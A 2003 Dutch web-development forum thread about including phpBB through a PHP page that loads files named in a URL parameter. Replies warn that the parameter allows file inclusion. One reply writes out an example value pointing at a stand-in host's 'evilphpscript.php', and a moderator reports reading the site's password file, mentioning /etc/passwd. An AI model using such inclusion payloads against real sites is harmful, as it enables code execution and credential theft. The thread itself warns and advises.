[PHPBB] Probleem met root-path

Pagina: 1
Acties:

• Rickyboy
  • Registratie: Juli 2001
  • Laatst online: 20-07 16:34

Rickyboy

A.K.A. Lounger

Topicstarter
URL's op mijn website werken met variabelen.
zoiets als dit:
code:
1
..../content/?content=site/tutorials/index.php

als ik dus phpBB wil opvragen, dan wordt het zoiets:
code:
1
..../content/?content=site/phpbb/index.php

Eigenlijk start ik phpBB dan op vanuit 2 dirs daarvoor, wat dus absoluut niet lukt...

wat kan ik hier aan doen?

Steam | R★ (PC & X360) | R★ (PC Alt.) | GTA V Tools

• KnEuTeR
  • Registratie: Mei 2000
  • Laatst online: 24-02-2024

KnEuTeR

iedereen heeft een handelsmerk

je zou het indirect kunnen doen, dus via die variabele een linkje opgeven naar een html in dezelfde directory, en in die html een redirect scriptje zetten die doorstuurt naar dat forum

dus met zoiets erin:
<META http-equiv="refresh" content="0; URL=http://www.url.com/forum.php">

maar dan kan je hem beter al gelijk redirecten denk ik ofzo?

hoe je het met die variabelen wilt doen weet ik zo nu ook niet, ik ken jouw scripts/server instellingen niet

[ Voor 19% gewijzigd door KnEuTeR op 11-03-2003 23:13 ]

Computers ain't that smart, Whatever man built could be taken apart

• Rickyboy

Rickyboy

A.K.A. Lounger

Topicstarter
hij moet als varibelen.....
hij kan ook als:
code:
1
..../content/index.php?content=site/......

in die index.php staat heel veel.....
het menu links, Db connectie, een check of je bent ingelogt en nog wat dingen..

• KnEuTeR

KnEuTeR

Rickyboy schreef op 11 maart 2003 @ 23:20:
hij moet als varibelen.....
hij kan ook als:
code:
1
..../content/index.php?content=site/......

in die index.php staat heel veel.....
het menu links, Db connectie, een check of je bent ingelogt en nog wat dingen..
ok, je laat dus een file includen die afhankelijk is van een variabelen die de gebruiker zo kan meegeven?!

heb je al eens aan gedacht dat er iemand daar zelf een anders script gaat zitten includen, als ik daar dus doe ?content=www.site.com/evilphpscript.php, kan ik zo je hele site platgooien als ik me eigen code include met een shellscript ofzo....!!!

zeer hackbaar dus, je kan het beter zo doen

aanroep: ?content=news

script op de pagina:

PHP:
1
2
3
4
5
6
7
8
9
switch ($content)
{
case "news":
    include("http://www.server.com/site/news.php");
    break;
case "forum":
    include("http://www.server.com/forum.php");
    break;
}

bijvoorbeeld even snel gemaakt, werkt dan zowieso beter, kan je daarvoor al je globale variabelen en database connecties in kwijt enzo

pas er mee op!

[ Voor 6% gewijzigd door KnEuTeR op 12-03-2003 01:51 ]

• F_J_K
  • Registratie: Juni 2001
  • Niet online

F_J_K

Moderator CSA/PB/AI

Front verplichte underscores

SA --> P&W :)

Controleer zelf nog even wat de policy daar is en of je topic daaraan voldoet. Zo niet kan je je post nog even aanvullen met de benodigde info :)

'Multiple exclamation marks,' he went on, shaking his head, 'are a sure sign of a diseased mind' (Terry Pratchett, Eric)

• drm
  • Registratie: Februari 2001
  • Laatst online: 09-06-2025

drm

f0pc0dert

offtopic:
includen via http werkt nooit zo lekker, gezien je dan geparsde PHP gaat includen ergo meestal HTML, en daar gaat PHP beetje van over zijn nek, op voorwaarde dat je uberhaupt fopen_url_wrappers voor include ook toelaat.

Rickyboy In overleg met F_J_K laat ik 't topic hier open, maar ik verzoek je om even je probleem duidelijk te formuleren aan de hand van de quickstart.

[ Voor 136% gewijzigd door drm op 12-03-2003 13:32 ]

Music is the pleasure the human mind experiences from counting without being aware that it is counting
~ Gottfried Leibniz

• KnEuTeR

KnEuTeR

volgens mij snapt hij niet eens dat ze topic nu hier staat, ik vond het ook al redelijk moeilijk om het terug te vinden :P

maar inderdaad, de vraag is ERG onduidelijk, ten opzichte van wat hij nou wil, en wat hij al heeft qua code etc.

[ Voor 33% gewijzigd door KnEuTeR op 12-03-2003 15:02 ]

• Rickyboy

Rickyboy

A.K.A. Lounger

Topicstarter
als het goed is kan het script alleen maar files includen die op de server zelf staan.
mja, ik heb de site ook niet zelf gemaakt....dus ik had het zelf heel anders gedaan.

maar wat nou mijn probleem is:

Ik wil dus de index.php van phpBB includen in mijn page (die al Db connectie heeft, een menu links heeft etc. etc.)

Maar waneer index.php van phpBB van een andere directorie wordt gestart, wil hij niet werken omdat die dan allemaal files niet kan vinden enzo....

edit:

hier kun je zien watvoor error ik krijg:
[url]--[/url] MODBREAK... Na ff te hebben gekeken blijk ik het toch redelijk bij het rechte eind te hebben. Ik kon idd je wachtwoord bestand opvragen. Lijkt me niet handig om een url naar een lekke site hier zomaar te hebben staan ;)

[ Voor 34% gewijzigd door Janoz op 12-03-2003 21:49 ]

• Janoz
  • Registratie: Oktober 2000
  • Laatst online: 23-08 10:39

Janoz

Moderator Devschuur®

!litemod

Rickyboy schreef op 12 March 2003 @ 21:38:
als het goed is kan het script alleen maar files includen die op de server zelf staan.
mja, ik heb de site ook niet zelf gemaakt....dus ik had het zelf heel anders gedaan.
Och, met een /etc/passwd zijn veel mensen ook al tevreden ;)
maar wat nou mijn probleem is:

Ik wil dus de index.php van phpBB includen in mijn page (die al Db connectie heeft, een menu links heeft etc. etc.)

Maar waneer index.php van phpBB van een andere directorie wordt gestart, wil hij niet werken omdat die dan allemaal files niet kan vinden enzo....

Het gebruik van dit template type heb ik eigenlijk nog nooit begrepen. Je kunt exact hetzelfde bereiken door niet je content in een index te includen, maar door in je content een header en een footer te includen. Knip gewoon je index.php doormidden op de positie van de include en klaar. Op dat moment heb je dezelfde mogenlijkheden, maar simpelere urls. Verder lost dit ook je PhpBB probleem op. Anders zul je waarschijnlijk ALLE posities waar PhpBB een link neer zet aan moeten passen.

Verder kunnen we je hier eigenlijk niet helpen.

[ Voor 6% gewijzigd door Janoz op 12-03-2003 21:53 ]

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

• Rickyboy

Rickyboy

A.K.A. Lounger

Topicstarter
Janoz schreef op 12 March 2003 @ 21:46:

[...]

Och, met een /etc/passwd zijn veel mensen ook al tevreden ;)

[...]

Het gebruik van dit template type heb ik eigenlijk nog nooit begrepen. Je kunt exact hetzelfde bereiken door niet je content in een index te includen, maar door in je content een header en een footer te includen. Knip gewoon je index.php doormidden op de positie van de include en klaar. Op dat moment heb je dezelfde mogenlijkheden, maar simpelere urls. Verder lost dit ook je PhpBB probleem op. Anders zul je waarschijnlijk ALLE posities waar PhpBB een link neer zet aan moeten passen.

Verder kunnen we je hier eigenlijk niet helpen.
dus het is gewoon echt niet mogelijk.....en dus moet ik mijn complete site aanpassen, wat ongeveer net zoveel werk is als compleet phpBB aanpassen |:(

• Janoz
  • Registratie: Oktober 2000
  • Laatst online: 23-08 10:39

Janoz

Moderator Devschuur®

!litemod

Rickyboy schreef op 12 maart 2003 @ 21:52:
[...]

dus het is gewoon echt niet mogelijk.....en dus moet ik mijn complete site aanpassen, wat ongeveer net zoveel werk is als compleet phpBB aanpassen |:(

Dat lijkt me sowieso een erg goed ID, maar zoveel werk zal het denk ik niet zijn. Ik heb net ff in je source gekeken (ja dat kan) en waneer je je index.php opsplitst en het stuk voor include($content) in een header.php zet en het stuk na include($content) in footer.php en vervolgens in alle content een include($header) bovenaan en een include($footer) onderaan zet moet het goedkomen.

Ken Thompson's famous line from V6 UNIX is equaly applicable to this post:
'You are not expected to understand this'

• Rickyboy

Rickyboy

A.K.A. Lounger

Topicstarter
whut, de 1 haalt me password file op, en de ander kijkt in me source....helluuupppp :P

Pagina: 1